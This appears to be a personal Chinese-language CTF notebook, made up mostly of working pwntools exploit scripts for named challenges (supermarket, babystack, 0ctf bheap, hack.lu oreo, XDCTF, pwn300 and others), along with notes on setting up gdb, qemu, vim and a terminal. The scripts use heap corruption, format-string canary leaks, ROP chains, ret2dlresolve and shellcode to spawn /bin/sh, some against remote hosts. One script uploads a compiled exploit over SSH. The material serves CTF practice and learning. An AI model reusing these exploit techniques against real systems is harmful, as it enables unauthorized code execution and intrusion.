攻防世界
supermarket
漏洞在于realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原指针, 重新分配内存.
可以用堆覆盖,大堆编辑其中的小堆:
# -*- coding: utf-8 -*-
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./supermarket"
p = process(name)
#p = remote("111.198.29.45",38460)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
libc=ELF('./libc.so.6')
if args.G:
gdb.attach(p)
# 漏洞在realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原原指针, 重新分配内存.
def add(name,size,description):
p.recvuntil("your choice>> ")
p.sendline("1")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("price:")
p.sendline("100")
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(description)
def change(name,size,description):
p.recvuntil("your choice>> ")
p.sendline("5")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(description)
def show():
p.recvuntil("your choice>> ")
p.sendline("3")
# 0x08048864
add('aaaa',0x20,"1111")
add('bbbb',0x80,"2222")
add('cccc',0x20,"3333")
change("bbbb",0xb0,"q")
add("dddd",0x50,'4444')
pay = b"dddd\x00" + b'q'*11 + p32(0x64) + p32(0x50) + p32(0x804b048)
change("bbbb",0x80,pay)
show()
p.recvuntil("dddd: price.100, des.")
atoi_addr = u32(p.recv(4))
libc_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc_addr + libc.symbols['system']
success("atoi_addr: " + hex(atoi_addr))
pay1 = p32(system_addr)
change("dddd",0x50,pay1)
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
note-service2
# -*- coding: utf-8 -*-
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
#p = remote("111.198.29.45",54704)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc=ELF('./pwn')
if args.G:
gdb.attach(p)
def add(i,data):
p.recvuntil("your choice>> ")
p.sendline("1")
p.recvuntil("index:")
p.sendline(str(i))
p.recvuntil("size:")
p.sendline('8')
p.recvuntil("content:")
p.send(data)
def delete(i):
p.recvuntil("your choice>> ")
p.sendline("4")
p.recvuntil("index:")
p.sendline(str(i))
add(0,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(1,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(2,asm('mov eax,0x3b') + b'\xeb\x19')
add(3,asm('xor rsi,rsi') + b'\x90\x90\xeb\x19')
add(4,asm('xor rdx,rdx') + b'\x90\x90\xeb\x19')
add(5,asm('syscall') + b'\x90'*5)
delete(0)
add(-8,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
Python base64替换密码表
import base64
import string
x = "5rFf7E2K6rqN7Hpiyush7E6S5fJg6rsi5NBf6NGT5rs="
base_now = ['v', 'w', 'x', 'r', 's', 't', 'u', 'o', 'p', 'q', '3', '4', '5', '6', '7', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'y', 'z', '0', '1', '2', 'P', 'Q', 'R', 'S', 'T', 'K', 'L', 'M', 'N', 'O', 'Z', 'a', 'b', 'c', 'd', 'U', 'V', 'W', 'X', 'Y', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', '8', '9', '+', '/']
base_now_str = ''.join(base_now)
print len(base_now_str)
base_original_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
print len(base_original_str)
flag = base64.b64decode(x.translate(string.maketrans(base_now_str, base_original_str)))
print flag
babystack
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('./babystack/libc-2.27.so')
if args.G:
gdb.attach(p)
p.recvuntil("What's your name: ")
pay = "a" * 133 + 'b'*4
p.send(pay)
p.recvuntil("bbbb")
cannary = u64('\x00' + p.recv(7))
core_starr = u64(p.recv(6) + '\x00\x00') - 0x910
success("canary: " + hex(cannary))
success("core_starr: " + hex(core_starr))
pop_rdi = core_starr + 0x973 #pop rdi; ret;
pay = 'a'*136 + p64(cannary) + p64(core_starr + 0x80a)
p.recvuntil("What do you want to say: ")
p.sendline(pay)
p.recvuntil("What's your name: ")
pay = "a" * (136+8) + 'b'*8
p.send(pay)
p.recvuntil("b" * 8)
lib_starr = u64(p.recv(6) + '\x00\x00') - 0x441270 #libc.symbols['__libc_start_main'] #0x441270
success("lib_starr: " + hex(lib_starr))
p.recvuntil("What do you want to say: ")
bin_sh = lib_starr + 0x5829d9 #libc.search['/bin/sh']#
system_addr = lib_starr + 0x460480 #libc.symbols['system']#0x460480
pay = 'c'*136 + p64(cannary) + "qqqqqqqq" + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
p.send(pay)
p.interactive()
'''
libc2.23:
system_offset = 0x45390 # 0x3f480
bin_sh_offset = 0x18cd57 # 0x1619d9
free_offset = 0x3e3e90
malloc_offset = 0x3e3e40
malloc_hook_offset = 0x3c4b10
free_hook_offset = 0x3c67a8
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
CTF-wiki
2017 0ctf bheap
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './bheap'
elf = ELF(name)
p = process(name)
#p = remote("111.198.29.45",30617)
if args.G:
gdb.attach(p)
def alloc(s):
p.recvuntil("Command: ")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline(str(s))
def fill(i,s,data):
p.recvuntil("Command: ")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline(str(i))
p.recvuntil("Size: ")
p.sendline(str(s))
p.recvuntil("Content: ")
p.sendline(data)
def free(i):
p.recvuntil("Command: ")
p.sendline("3")
p.recvuntil("Index: ")
p.sendline(str(i))
def dump(i):
p.recvuntil("Command: ")
p.sendline("4")
p.recvuntil("Index: ")
p.sendline(str(i))
alloc(10) # 0
alloc(10) # 1
alloc(10) # 2
alloc(10) # 3
alloc(10) # 4
alloc(0x80) # 5
free(1)
free(3)
payload = 'a'*24 + p64(0x21) + p8(0xa0)
fill(2,len(payload),payload)
payload = 'a'*24 + p64(0x21)
fill(4,len(payload),payload)
alloc(10) # 1
alloc(10) # 3 5
payload = 'a'*24 + p64(0x91)
fill(4,len(payload),payload)
alloc(0x80) # 6
free(5)
dump(3)
p.recvuntil("Content: \n")
main_arena = u64(p.recv(6) + '\x00\x00') - 0x58
success("main_arena: " + hex(main_arena))
alloc(0x60) # 5
free(5)
payload = p64(main_arena-0x33)
fill(3,len(payload),payload)
alloc(0x60) # 5
alloc(0x60) # 6
one_gadget = main_arena - 0x399b00 + 0x3f35a
payload = '|/bin/sh;' + 'a'*10 + p64(one_gadget)
fill(7,len(payload),payload)
alloc(0x20)
p.interactive()
2015 9447 CTF : Search Engine
Double_Free:
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './search'
p = process(name)
if args.G:
gdb.attach(p)
def search(s):
p.recvuntil("3: Quit\n")
p.sendline("1")
p.recvuntil("Enter the word size:\n")
p.sendline(str(len(s)))
p.recvuntil("Enter the word:\n")
p.sendline(s)
def delete(s):
p.recvuntil("Delete this sentence (y/n)?\n")
p.sendline(s)
def index(s):
p.recvuntil("3: Quit\n")
p.sendline("2")
p.recvuntil("Enter the sentence size:\n")
p.sendline(str(len(s)))
p.recvuntil("Enter the sentence:\n")
p.sendline(s)
def offset_bin_main_arena(idx):
word_bytes = context.word_size / 8
offset = 4 # lock
offset += 4 # flags
offset += word_bytes * 10 # offset fastbin
offset += word_bytes * 2 # top,last_remainder
offset += idx * 2 * word_bytes # idx
offset -= word_bytes * 2 # bin overlap
return offset
unsortedbin_offset_main_arena = offset_bin_main_arena(0)
index("a"*0x85 + " s")
search("s")
delete('y')
search("\x00")
p.recvuntil("Found 135: ")
lib_addr = u64(p.recv(6) + '\x00\x00')
one_gadget_addr = lib_addr - 0x399b58 + 0x3f306
main_arena_addr = lib_addr - 0x58
delete('n')
index('a'*0x5d + ' d')
index('b'*0x5d + ' d')
index('c'*0x5d + ' d')
search("d")
delete("y")
delete("y")
delete("y")
search("\x00")
delete("y")
delete("n")
delete("n")
fake_chunk_addr = main_arena_addr - 0x33
fake_chunk = p64(fake_chunk_addr).ljust(0x60, 'f')
index(fake_chunk)
index('a' * 0x60) #分配chunk_a
index('b' * 0x60) #分配chunk_b
payload = '|/bin/sh;'
payload += (0x13-len(payload))*'a' + p64(one_gadget_addr)
payload = payload.ljust(0x60, 'f')
index(payload) #malloc_hook为one_gadget
success("lib_addr: " + hex(lib_addr))
p.interactive()
2014 hack.lu oreo
House Of Spirit:
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './oreo'
p = process(name)
if args.G:
gdb.attach(p)
def add(name,descrip):
#p.recvuntil("Action: ")
p.sendline('1')
#p.recvuntil('Rifle name: ')
p.sendline(name)
#p.recvuntil('Rifle description: ')
#sleep(0.5)
p.sendline(descrip)
def show():
#p.recvuntil("Action: ")
p.sendline('2')
p.recvuntil('===================================\n')
def order():
#p.recvuntil("Action: ")
p.sendline('3')
def message(notice):
#p.recvuntil("Action: ")
p.sendline('4')
#p.recvuntil("Enter any notice you'd like to submit with your order: ")
p.sendline(notice)
name = 'a'*27 + p32(0x804a248)
descrip = 'a'*25
add(name,descrip)
show()
p.recvuntil("===================================\nName: \nDescription: ")
put_addr = u32(p.recv(4))
system_addr = put_addr - 0x24d40
success("put_addr: " + hex(put_addr))
success("system_addr: " + hex(system_addr))
for i in range(1,0x3f):
name = 'a'*27 + p32(0)
descrip = 'a'*25
add(name,descrip)
name = 'a'*27 + p32(0x804a2a8)
descrip = 'a'*25
add(name,descrip)
payload = 0x20 * '\x00' + p32(0x40) + p32(0x90)
message(payload)
order()
add('a'*4,p32(0x804a250))
notice = p32(system_addr) + '||/bin/sh\x00'
message(notice)
p.interactive()
常用URL
字典:
https://github.com/rootphantomer/Blasting_dictionary
upload
#!/usr/bin/python
from pwn import *
HOST = "35.221.78.115"
PORT = 10022
USER = "pwn"
PW = "sir"
def compile():
log.info("Compile")
os.system("gcc -w -static poc.c -o poc")
def exec_cmd(cmd):
r.sendline(cmd)
r.recvuntil("$ ")
def upload():
p = log.progress("Upload")
with open("poc", "rb") as f:
data = f.read()
encoded = base64.b64encode(data)
r.recvuntil("$ ")
for i in range(0, len(encoded), 300):
p.status("%d / %d" % (i, len(encoded)))
exec_cmd("echo \"%s\" >> benc" % (encoded[i:i+300]))
exec_cmd("cat benc | base64 -d > exp")
exec_cmd("chmod +x exp")
p.success()
def exploit(r):
compile()
upload()
r.interactive()
return
if __name__ == "__main__":
if len(sys.argv) > 1:
session = ssh(USER, HOST, PORT, PW)
r = session.run("/bin/sh")
exploit(r)
else:
r = process("./start.sh")
print util.proc.pidof(r)
pause()
exploit(r)
gdb
源码下载:
http://ftp.gnu.org/gnu/gdb
国内源: https://mirrors.ustc.edu.cn/gnu/gdb/
源码修改,将./gdb/remote.c中:
if (buf_len > 2 * rsa->sizeof_g_packet)
error (_("Remote 'g' packet reply is too long: %s"), rs->buf);
改为:
if (buf_len > 2 * rsa->sizeof_g_packet) {
rsa->sizeof_g_packet = buf_len;
for (i = 0; i < gdbarch_num_regs (gdbarch); i++)
{
if (rsa->regs[i].pnum == -1)
continue;
if (rsa->regs[i].offset >= rsa->sizeof_g_packet)
rsa->regs[i].in_g_packet = 0;
else
rsa->regs[i].in_g_packet = 1;
}
}
配置:
./configure -prefix=/usr/local/gdb \
--with-python='/usr/bin/python3.5'
编译:
make -j8
安装:
sudo make install
安装依赖等:
sudo aptitude install texinfo
.gdbinit:
#/home/sir/tools/pwndbg/docs/gdb
set architecture i386:x86-64:intel
pip
python3 -m pip install --upgrade pip --force-reinstall
Python源:
中国科技大学 https://pypi.mirrors.ustc.edu.cn/simple/
清华大学 https://pypi.tuna.tsinghua.edu.cn/simple/
中国科学技术大学 https://pypi.mirrors.ustc.edu.cn/simple/
阿里云 https://mirrors.aliyun.com/pypi/simple/
豆瓣(douban) https://pypi.douban.com/simple/
vmliux
#!/bin/sh
check_vmlinux()
{
# Use readelf to check if it's a valid ELF
# TODO: find a better to way to check that it's really vmlinux
# and not just an elf
readelf -h $1 > /dev/null 2>&1 || return 1
cat $1
exit 0
}
try_decompress()
{
# The obscure use of the "tr" filter is to work around older versions of
# "grep" that report the byte offset of the line instead of the pattern.
# Try to find the header ($1) and decompress from here
for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
do
pos=${pos%%:*}
tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
check_vmlinux $tmp
done
}
# Check invocation:
me=${0##*/}
img=$1
if [ $# -ne 1 -o ! -s "$img" ]
then
echo "Usage: $me <kernel-image>" >&2
exit 2
fi
# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0
# That didn't work, so retry after decompression.
try_decompress '\037\213\010' xy gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh' xy bunzip2
try_decompress '\135\0\0\0' xxx unlzma
try_decompress '\211\114\132' xy 'lzop -d'
try_decompress '\002!L\030' xxx 'lz4 -d'
try_decompress '(\265/\375' xxx unzstd
# Finally check for uncompressed images or objects:
check_vmlinux $img
# Bail out:
echo "$me: Cannot find vmlinux." >&2
python&&C混合编程
使用python标准库中自带的ctypes模块进行python和c的混合编程,需要先查找动态链接库:
sir@sir-PC:~/desktop$ ldd pwn1
linux-vdso.so.1 (0x00007ffcaa9e0000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6a323f6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f6a327d9000)
from pwn import *
from ctypes import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = "./pwn1"
elf = ELF(name)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
#p = process(name)
p = remote('111.198.29.45',30261)
if args.G:
gdb.attach(p)
p.recvuntil("Your name:")
p.sendline('a'*0x20 + p64(0x1))
libc.srand(1)
for i in range(10):
num = str(libc.rand()%6+1)
p.recvuntil('number:')
p.sendline(num)
p.interactive()
deepin终端仿kali配色
sudo cp ~/.bashrc /root/.bashrc
vim ~/.config/deepin/deepin-terminal/config.conf
[general]
theme=aci
opacity=1
font=Noto Mono
font_size=11
[shortcut]
copy=Ctrl + c
paste=Ctrl + v
open=Alt + q
search=Ctrl + f
zoom_in=Ctrl + =
zoom_out=Ctrl + -
default_size=Ctrl + 0
select_all=Ctrl + a
jump_to_next_command=Shift + Down
jump_to_previous_command=Shift + Up
new_workspace=Ctrl + Shift + t
close_workspace=Ctrl + Shift + w
next_workspace=Ctrl + Tab
previous_workspace=Ctrl + Shift + Tab
vertical_split=Ctrl + Shift + j
horizontal_split=Ctrl + Shift + h
select_upper_window=Alt + k
select_lower_window=Alt + j
select_left_window=Alt + h
select_right_window=Alt + l
close_window=Ctrl + Alt + q
close_other_windows=Ctrl + Shift + q
rename_title=F2
switch_fullscreen=F11
display_shortcuts=Ctrl + Shift + ?
custom_commands=Ctrl + [
remote_management=Ctrl + /
select_workspace=Alt
new_theme_terminal=Ctrl + Alt
resize_workspace_up=Ctrl + Alt + Up
resize_workspace_down=Ctrl + Alt + Down
resize_workspace_left=Ctrl + Alt + Left
resize_workspace_right=Ctrl + Alt + Right
[advanced]
cursor_shape=ibeam
cursor_blink_mode=true
cursor_auto_hide=false
scroll_on_key=true
scroll_on_output=false
scroll_line=-1
use_on_starting=window
blur_background=false
window_width=941
window_height=668
quake_window_height=0
quake_window_fullscreen=false
remote_commands=zssh
hide_quakewindow_after_lost_focus=false
show_quakewindow_tab=true
follow_active_window=true
hide_quakewindow_when_active=true
print_notify_after_script_finish=true
run_as_login_shell=false
show_highlight_frame=false
copy_on_select=false
bold_is_bright=false
audible_bell=false
always_hide_resize_grip=false
tabbar_at_the_bottom=false
[theme]
color_1=#363636
color_2=#ff0883
color_3=#e01900
color_4=#ff8308
color_5=#0883ff
color_6=#8308ff
color_7=#08ff83
color_8=#b6b6b6
color_9=#424242
color_10=#ff1e8e
color_11=#8eff1e
color_12=#ff8e1e
color_13=#1e8eff
color_14=#8e1eff
color_15=#1eff8e
color_16=#c2c2c2
background=#0d1926
foreground=#fbf5ef
tab=#31B96E
style=dark
[theme_terminal]
theme1=solarized dark
theme2=bim
theme3=hemisu light
theme4=gruvbox light
theme5=elementary
theme6=azu
theme7=aco
theme8=miu
theme9=material
qmeu
打包:
find . | cpio -o --format=newc > ../rootfs.cpio
解压:
cpio -idmv < ../rootfs.cpio
启动:
#!/bin/bash
qemu-system-x86_64 \
-initrd rootfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-monitor /dev/null \
-m 256M \
--nographic \
-smp cores=1,threads=1 \
-cpu kvm64,+smep \
-gdb tcp::1234
关闭 kptr_restrict:
echo 0 > /proc/sys/kernel/kptr_restrict
vim设置
安装Vundle:
git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
安装auto-pairs插件
git clone git://github.com/jiangmiao/auto-pairs.git ~/.vim/bundle/auto-pairs
# vim /etc/vim/vimrc
set nocompatible " be iMproved, required
filetype off " required
set rtp+=/home/sir/.vim/bundle/Vundle.vim
call vundle#begin()
Plugin 'VundleVim/Vundle.vim'
Plugin 'jiangmiao/auto-pairs'
call vundle#end()
filetype plugin indent on
set ts=4
set nu
set expandtab
set smartindent
set cindent
set shiftwidth=4
set softtabstop=4
IDA_IDC脚本_Dump
auto i,fp;
fp = fopen("D:\\dump.txt","wb");
for(i=0x403230;i<0x403617;i++)
fputc(Byte(i),fp);
python处理文件
'''
import re
file1 = open('sir.log', 'r')
file2 = open('sir.txt', 'w')
for line in file1.readlines():
if re.match(r'^name_cn.*\n',line):
file2.write(line)
'''
# -*- coding:utf-8 -*-
#! python2
import shutil
a=0
readDir = "./sir.txt" #old
writeDir = "./new.txt" #new
lines_seen = set()
outfile = open(writeDir, "w")
f = open(readDir, "r")
for line in f:
if line not in lines_seen:
a+=1
outfile.write(line)
lines_seen.add(line)
print(a)
print('\n')
outfile.close()
print("success")
i春秋_break
from pwn import *
context.log_level = 'debug'
name = './pwn'
p = process(name)
#p = remote('106.75.2.53', 10008)
elf = ELF(name)
if args.G:
gdb.attach(p)
main_addr = 0x080486DD
p.recvuntil("Yo, what's your name:\n")
pay = 'a'*12 + p32(elf.plt['printf']) + p32(main_addr) + p32(elf.got['read']) + 'b'*4
p.sendline(pay)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.recvuntil('packing drugs...\n')
printf_addr = u32(p.recv()[4:8])
system_addr = printf_addr - 0x13e80
bin_sh_addr = printf_addr + 0x12c24a
success("printf_addr " + hex(printf_addr))
success("system_addr " + hex(system_addr))
pay1 = 'a'*12 + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr) + 'b'*4
p.sendline(pay1)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.interactive()
看雪_流浪者
#include<stdio.h>
int main() {
char source[] = "abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ" ;
char key[] = "KanXueCTF2019JustForhappy";
int y,i;
for ( i = 0; i<26 ; i++ ) {
int x = 48;
while(x<122) {
if ( x > 57 || x < 48 ) {
if ( x > 122 || x < 97 ) {
if ( x > 90 || x < 65 ) {
x++;
continue;
} else
y = x - 29;
} else {
y = x - 87;
}
} else {
y = x - 48;
}
if(y>0&&y<62&&source[y] == key[i]) {
printf("%c",x); //j0rXI4bTeustBiIGHeCF70DDM
x++;
continue;
}
x++;
}
}
return 0;
}
i春秋_loading
mmap函数可以使空间拥有可执行权限;
计算机浮点数的表示方法;
from pwn import *
import struct
p = remote('106.75.2.53',10009)
#p = process('./loading')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
gdb.attach(p)
def get_int(s):
a = struct.unpack('<f', s)[0]*2333
return struct.unpack('I', struct.pack('<I', a))[0]
for i in range(3):
p.sendline(str(get_int('\x00\x00\x00\x00')))
p.sendline(str(get_int('\x99\x89\xc3\x47'))) # mov ebx, eax
p.sendline(str(get_int('\x41\x44\x44\x44'))) # nop/align
for c in '/bin/sh\x00':
p.sendline(str(get_int('\x99\xb0'+c+'\x47'))) # mov al, c
p.sendline(str(get_int('\x57\x89\x03\x43'))) # mov [ebx], eax; inc ebx
for i in range(8):
p.sendline(str(get_int('\x57\x4b\x41\x47'))) # dec ebx
p.sendline(str(get_int('\x99\x31\xc0\x47'))) # xor eax, eax
p.sendline(str(get_int('\x99\x31\xc9\x47'))) # xor ecx, ecx
p.sendline(str(get_int('\x99\x31\xd2\x47'))) # xor edx, edx
p.sendline(str(get_int('\x99\xb0\x0b\x47'))) # mov al, 0xb
p.sendline(str(get_int('\x99\xcd\x80\x47'))) # int 0x80
p.sendline('c')
p.interactive()
[*] Switching to interactive mode
[DEBUG] Received 0xb bytes:
'try to pwn\n'
try to pwn
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x2b bytes:
'flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}\n'
flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}
$
[*] Closed connection to 106.75.2.53 port 10009
XDCTF_pwn01
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './main'
p = process(name)
elf= ELF(name)
rel_plt_addr = elf.get_section_by_name('.rel.plt').header.sh_addr #0x8048330
dynsym_addr = elf.get_section_by_name('.dynsym').header.sh_addr #0x80481d8
dynstr_addr = elf.get_section_by_name('.dynstr').header.sh_addr #0x8048278
resolve_plt = 0x08048380
leave_ret_addr = 0x0804851D
start = 0x804aa00
fake_rel_plt_addr = start
fake_dynsym_addr = fake_rel_plt_addr + 0x8
fake_dynstr_addr = fake_dynsym_addr + 0x10
bin_sh_addr = fake_dynstr_addr + 0x7
n = fake_rel_plt_addr - rel_plt_addr
r_info = (((fake_dynsym_addr - dynsym_addr)/0x10) << 8) + 0x7
str_offset = fake_dynstr_addr - dynstr_addr
fake_rel_plt = p32(elf.got['read']) + p32(r_info)
fake_dynsym = p32(str_offset) + p32(0) + p32(0) + p32(0x12000000)
fake_dynstr = "system\x00/bin/sh\x00\x00"
pay1 = 'a'*108 + p32(start - 20) + p32(elf.plt['read']) + p32(leave_ret_addr) + p32(0) + p32(start - 20) + p32(0x100)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(pay1)
pay2 = p32(0x0) + p32(resolve_plt) + p32(n) + 'aaaa' + p32(bin_sh_addr) + fake_rel_plt + fake_dynsym + fake_dynstr
p.sendline(pay2)
success(".rel_plt: " + hex(rel_plt_addr))
success(".dynsym: " + hex(dynsym_addr))
success(".dynstr: " + hex(dynstr_addr))
success("fake_rel_plt_addr: " + hex(fake_rel_plt_addr))
success("fake_dynsym_addr: " + hex(fake_dynsym_addr))
success("fake_dynstr_addr: " + hex(fake_dynstr_addr))
success("n: " + hex(n))
success("r_info: " + hex(r_info))
success("offset: " + hex(str_offset))
success("system_addr: " + hex(fake_dynstr_addr))
success("bss_addr: " + hex(elf.bss()))
p.interactive()
sha1加密
from hashlib import *
i = 0
while(1):
pwd = str(i)
s1 = sha1()
s1.update(pwd.encode('utf-8'))
result = s1.hexdigest()
if '40bd001563085f' in result:
print("flag: " + str(i))
break
i += 1
print(result)
2017湖湘杯_pwn300
程序在计算加减乘除功能的时候,将结果保存在申请的堆中,最后将堆中的结果复制到栈中,这就导致了可能会栈溢出;
然后 程序又是通过静态编译的,可以在程序中找到合适ROP链;
ROPgadget --binary pwn300 --ropchain
然后程序又只能输入十进制的数,可以通过ctypes.c_int32(j).value的方式输入;
from pwn import *
import binascii
import ctypes as ct
from struct import pack
#context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './helloworld'
io = process(name)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
gdb.attach(io)
def base_addr(pro_addr,offset):
return eval(pro_addr)-offset
p=[]
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea060) # @ .data
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('nib/')))
p.append( 0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea064) # @ .data + 4
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('hs//')))
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x080481c9) # pop ebx ; ret
p.append(0x080ea060) # @ .data
p.append(0x0806ed31) # pop ecx ; pop ebx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x080ea060) # padding without overwrite ebx
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x08049781) # int 0x80
tempnum=0
#debug()
io.recvuntil('How many times do you want to calculate:')
io.sendline('255')
for i in xrange(0,16):
io.recvuntil('5 Save the result\n')
io.sendline('3')
io.recvuntil('input the integer x:')
io.sendline(str(tempnum))
io.recvuntil('input the integer y:')
io.sendline('1')
for j in p:
io.recvuntil('5 Save the result\n')
io.sendline('1')
io.recvuntil('input the integer x:')
io.sendline(str(ct.c_int32(j).value))
io.recvuntil('input the integer y:')
io.sendline('0')
io.recvuntil('5 Save the result\n')
io.sendline('5')
io.interactive()
io.close()
西湖论剑_story
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './story'
#p = process(name)
p = remote('ctf2.linkedbyx.com',10955)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
gdb.attach(p)
p.recvuntil('Please Tell Your ID:')
p.sendline('aaaa%15$p')
p.recvuntil('aaaa')
x = p.recv()
canary = int(x[0:18],16)
pop_rdi_addr = 0x400bd3
main = 0x400876
pay = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(elf.got['__libc_start_main']) + p64(elf.plt['puts']) + p64(main)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay)
__libc_start_main_addr = u64(p.recv(6) + '\x00\x00')
system_addr = __libc_start_main_addr + 0x24c50
pay1 = "/bin/sh;%p"
p.recvuntil('Please Tell Your ID:')
p.sendline(pay1)
p.recvuntil('/bin/sh;')
binsh_addr = p.recv()
binsh_addr = int(binsh_addr[0:15],16)
pay2 = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay2)
print "canary: " + hex(canary)
print "__libc_start_main: " + hex(__libc_start_main_addr)
print "system_addr: " + hex(system_addr)
print "binsh_addr: " + hex(binsh_addr)
p.interactive()
# flag{35d06db7c9b25265da7ee6a384ebef5a}
i春秋_breakingbad
from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './break'
p = process(name)
#p = remote('106.75.2.53',10008)
elf= ELF(name)
#libc = ELF('./bc.so.6')
if args.G:
gdb.attach(p)
#0x804863c
p.recvuntil("Yo, what's your name:\n")
pay = 'b'*12 + p32(elf.plt['puts']) + p32(0x8048470) + p32(elf.got['puts']) + 'aaa'
p.sendline(pay)
#Methamphetamine
p.recvuntil('aaa\n')
p.sendline('Methamphetamine' + '\xff\xff') #整数溢出
p.recvuntil('packing drugs...\n')
puts_addr = u32(p.recv(4))
system_addr = puts_addr - 0x2a540
success("puts_addr: " + hex(puts_addr))
success("system_addr: " + hex(system_addr))
p.recvuntil("Yo, what's your name:\n")
p.sendline('c'*12 + p32(elf.plt['read']) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8) + 'sir')
